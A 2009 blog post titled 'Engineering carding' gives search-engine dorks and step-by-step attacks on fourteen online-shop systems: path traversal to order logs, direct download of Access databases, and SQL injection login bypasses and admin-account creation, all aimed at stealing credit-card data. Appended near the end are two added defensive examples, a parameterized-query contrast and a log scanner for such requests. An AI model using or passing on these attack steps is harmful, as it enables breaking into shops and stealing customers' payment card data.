Engineering carding
Posted on 7/22/2009
1. Example of a shop-system bug: shopadmin
Shops running this system show up in search engines when someone types a keyword such as:
Google.com Type: -> allinurl: / shopadmin.asp
Sample target: www.xxxxxx.com / shopadmin.asp
The weakness of this system shows when criminals enter injected code, such as:
user: 'or'1
pass: 'or'1
2. Example of a shop-system bug: Index CGI
Shops running this system show up in search engines when someone types a keyword such as:
google.com: Type -> allinurl: / store / index.cgi / page =
Sample target: www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Delete short_blue.htm and replace it with -> .. / admin / files / order.log
The result: www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log
3. Example of a shop-system bug: metacart
Shops running this system show up in search engines when someone types a keyword such as:
google.com allinurl: / metacart /
Sample target: www.xxxxxx.com / metacart / about.asp
Remove Moreinfo.asp and replace it with -> / database / metacart.mdb
The result: / www.xxxxxx.com / metacart / database / metacart.mdb
4. Example of a shop-system bug: DCShop
Shops running this system show up in search engines when someone types a keyword such as:
google.com: Type -> allinurl: / DCShop /
Example: www.xxxxxx.com / xxxx / DCShop / xxxx
Remove / DCShop / xxxx and replace with -> / DCShop / orders / orders.txt
or / DCShop / Orders / orders.txt
The result: www.xxxx.com / xxxx / DCShop / orders / orders.txt
5. Example of a shop-system bug: PDshopro
Shops running this system show up in search engines when someone types a keyword such as:
google.com: Type -> allinurl: / shop / category.asp / catid =
Example: www.xxxxx.com/shop/category.asp/catid=xxxxxx
Remove / shop / category.asp / catid = xxxxx and replace it with -> / admin / dbsetup.asp
The result: www.xxxxxx.com / admin / dbsetup.asp
The resulting page shows a file with the database name sdatapdshoppro.mdb
Download the file sdatapdshoppro.mdb from the URL
www.xxxxxx.com / data / pdshoppro.mdb
Open the file with Microsoft Access (an .mdb database is read with MS Access)
6. Example of a shop-system bug: commerceSQL
Shops running this system show up in search engines when someone types a keyword such as:
google: Type -> allinurl: / commercesql /
Example: www.xxxxx.com / commercesql / xxxxx
Remove commercesql / xxxxx and replace with ->
cgi-bin/commercesql/index.cgi? page =
The result: www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page =
To view the admin config ->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
To view the admin manager ->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
To view the log file / the CC data ->
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order ...
7. Example of a shop-system bug: eShop
Shops running this system show up in search engines when someone types a keyword such as:
google: Type -> allinurl: / eShop /
Example: www.xxxxx.com / xxxxx / eShop
Remove / eShop and replace with -> / cg-bin/eshop/database/order.mdb
The result: www.xxxxxx.com / ... / cg-bin / eShop / database / order.mdb
Download the *.mdb file and open it with Microsoft Access
(an .mdb database is read with MS Access)
8. Example of a shop-system bug: Cart32 v3.5a
Shops running this system show up in search engines when someone types a keyword such as:
google.com: Type -> allinurl: / cart32.exe /
Example: www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Replace NoItemFound with -> error
If an error page with installation information appears,
the attempt has succeeded.
On that page, scroll down and look for the Page Setup and Directory
section.
If it lists files with the .c32 suffix,
the site holds files containing CC data.
Copy the .c32 file names into Notepad or
another text editor.
Change page url string. be like this: http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Then paste the .c32 file names, one by one, at the end of the URL you
modified before, in the format
http://www.xxxxx.com/cart32/
Example http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
9. Example of a shop-system bug: VP-ASP Shopping Cart 5.0
(technique / method two)
google.com Type -> allinurl: / vpasp / shopdisplayproducts.asp
Open the target url and add the following string at the end of the
shopdisplayproducts.asp
Example:
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty '% 20union %...,
fldpassword% 20from% 20tbluser% 20where% 20fldusername =
'admin'% 20and% 20fldpassword% 20like% 20'a% 25' --
Change the last value in the URL string to:
% 20'a% 25' --
20'b%% 25' --
% 20'c% 25' --
If successful, we will get the admin username and password
information.
To log in to the admin: http://xxxx.com/vpasp/shopadmin.asp
Find the CC data yourself.
10. Example of a shop-system bug: VP-ASP Shopping Cart 5.0
Shops running this system show up in search engines when someone types a keyword such as:
google.com: Type -> allinurl: / vpasp / shopsearch.asp
Open the target URL and create a new admin by posting the following data,
one by one, in the search engines:
Keyword = & category = 5); insert into tbluser (fldusername) values
('')--& = & SubCategory = hide & action.x = 46 & action.y = 6
Keyword = & category = 5); update tbluser set fldpassword =''where
fldusername =''--& SubCategory = All & action.x = 33 & action.y = 6
Keyword = & category = 3); update tbluser set fldaccess ='1 'where
fldusername =''--& SubCategory = All & action.x = 33 & action.y = 6
Do not forget to change and it's up to you.
To change the admin password, enter the keyword below:
Keyword = & category = 5); update tbluser set fldpassword =''where
fldusername = 'admin' - & SubCategory = All & action.x = 33 & action.y = 6
Login to admin, in http://xxxxxxx/vpasp/shopadmin.asp
11. Example of a shop-system bug: Lobby.asp
Shops running this system show up in search engines when someone types a keyword such as:
google.com Type -> allinurl: Lobby.asp
Example: www.xxxxx.com / mall / lobby.asp
Remove the text mall / lobby.asp and replace it with -> fpdb / shop.mdb
The result: www.xxxxx.com / fpdb / shop.mdb
12. Example of a shop-system bug: Shopper.cgi
Shops running this system show up in search engines when someone types a keyword such as:
google: Type -> allinurl: / cgi-local/shopper.cgi
Example: www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key =
Add the -> & template = ... order.log
The result: www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=...&template ...
13. Example of a shop-system bug: Proddetail.asp
Shops running this system show up in search engines when someone types a keyword such as:
Type -> allinurl: proddetail.asp? Prod =
Example: www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Remove the text proddtail.asp? Prod = SG369 and replace it with -> fpdb /
vsproducts.mdb
The result: www.xxxxxx.org / fpdb / vsproducts.mdb
14. Example of a shop-system bug: Digishop
Shops running this system show up in search engines when someone types a keyword such as:
Type in google -> inurl: "/ cart.php? m ="
Example: http://xxxxxxx.com/store/cart.php?m=view.
Remove the text cart.php? M = view and replace it with -> admin
The result http://xxxxxx.com/store/admin
Log in with the same username and password, using the SQL injection statement:
Username: 'or "="
Password: 'or "="
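The login bypasses in items 1 and 14 succeed because the login query is assembled by string concatenation. As an added example (not part of the original post), here is that "before" query beside a parameterized one, with Python's sqlite3 standing in for the shop's ASP/Access back end; the `users` table, its columns and the passphrase are constructed for illustration.

```python
import hashlib
import hmac
import os
import sqlite3

def kdf(password, salt):
    """Salted, slow hash so the stored value is not the password itself."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """In-memory stand-in for the shop's user table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, legacy_pw TEXT,"
               " salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    # legacy_pw exists only so the concatenated 'before' query has a column to compare.
    db.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
               ("admin", "constructed-passphrase", salt,
                kdf("constructed-passphrase", salt)))
    return db

def login_vulnerable(db, user, password):
    """'Before': input is pasted into the SQL text, so a quote rewrites the WHERE clause."""
    sql = ("SELECT COUNT(*) FROM users WHERE name = '" + user +
           "' AND legacy_pw = '" + password + "'")
    return db.execute(sql).fetchone()[0] > 0

def login_safe(db, user, password):
    """'After': the name is bound as data and the password is verified against the hash."""
    row = db.execute("SELECT salt, pw_hash FROM users WHERE name = ?",
                     (user,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(kdf(password, row[0]), row[1])

if __name__ == "__main__":
    db = make_db()
    tautology = "'or'1"  # the input shown in item 1 of this page
    print("concatenated query accepts it: ", login_vulnerable(db, tautology, tautology))
    print("parameterized query accepts it:", login_safe(db, tautology, tautology))
    print("real credentials still work:   ",
          login_safe(db, "admin", "constructed-passphrase"))
```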
.:: Note !::..
I DON'T TAKE ANY RESPONSIBILITY FOR ANYTHING ... U TAKE UR OWN RISK ..!!!
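Most of the items above rest on two server-side conditions: order and database files kept under the web root, and a `page=` or `template=` parameter that accepts `../`. As an added example (not part of the original post), this check flags both in a web access log and records whether the server actually answered; the log lines are constructed and the Combined Log Format is an assumption.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Request target and status code from a Common/Combined Log Format entry.
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Data stores named on this page: Access databases, Cart32 .c32 files, order logs.
DATA_FILE = re.compile(r"\.(?:mdb|c32)$|/(?:order\.log|orders\.txt)$", re.I)

def normalise(text, rounds=2):
    """Undo percent-encoding before matching and unify path separators."""
    for _ in range(rounds):
        text = unquote_plus(text)
    return text.replace("\\", "/")

def classify(line):
    """Return a finding dict for a suspicious log line, or None for a normal one."""
    m = REQ.search(line)
    if not m:
        return None
    target, status = m.group(1), int(m.group(2))
    parts = urlsplit(target)
    tags = []
    if DATA_FILE.search(normalise(parts.path)):
        tags.append("data-file")
    if "../" in normalise(parts.query) or "/../" in normalise(parts.path):
        tags.append("path-traversal")
    if not tags:
        return None
    # A 2xx status means the content was handed over: treat as a possible breach.
    return {"target": target, "status": status, "tags": tags,
            "served": 200 <= status < 300}

def scan(lines):
    return [finding for finding in map(classify, lines) if finding]

# Constructed sample log (documentation addresses, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jul/2009:10:00:01 +0000] "GET /cgi-bin/store/index.cgi?page=short_blue.htm HTTP/1.1" 200 5120',
    '192.0.2.77 - - [22/Jul/2009:10:02:13 +0000] "GET /cgi-bin/store/index.cgi?page=../admin/files/order.log HTTP/1.1" 200 88112',
    '192.0.2.78 - - [22/Jul/2009:10:05:40 +0000] "GET /fpdb/shop.mdb HTTP/1.1" 200 734003',
    '192.0.2.79 - - [22/Jul/2009:10:06:02 +0000] "GET /DCShop/orders/orders.txt HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["status"], ",".join(f["tags"]), "SERVED" if f["served"] else "refused", f["target"])
```

Any finding marked as served means the file left the server; the durable fix is to move order logs and databases out of the document root and to resolve `page=` values against a fixed directory.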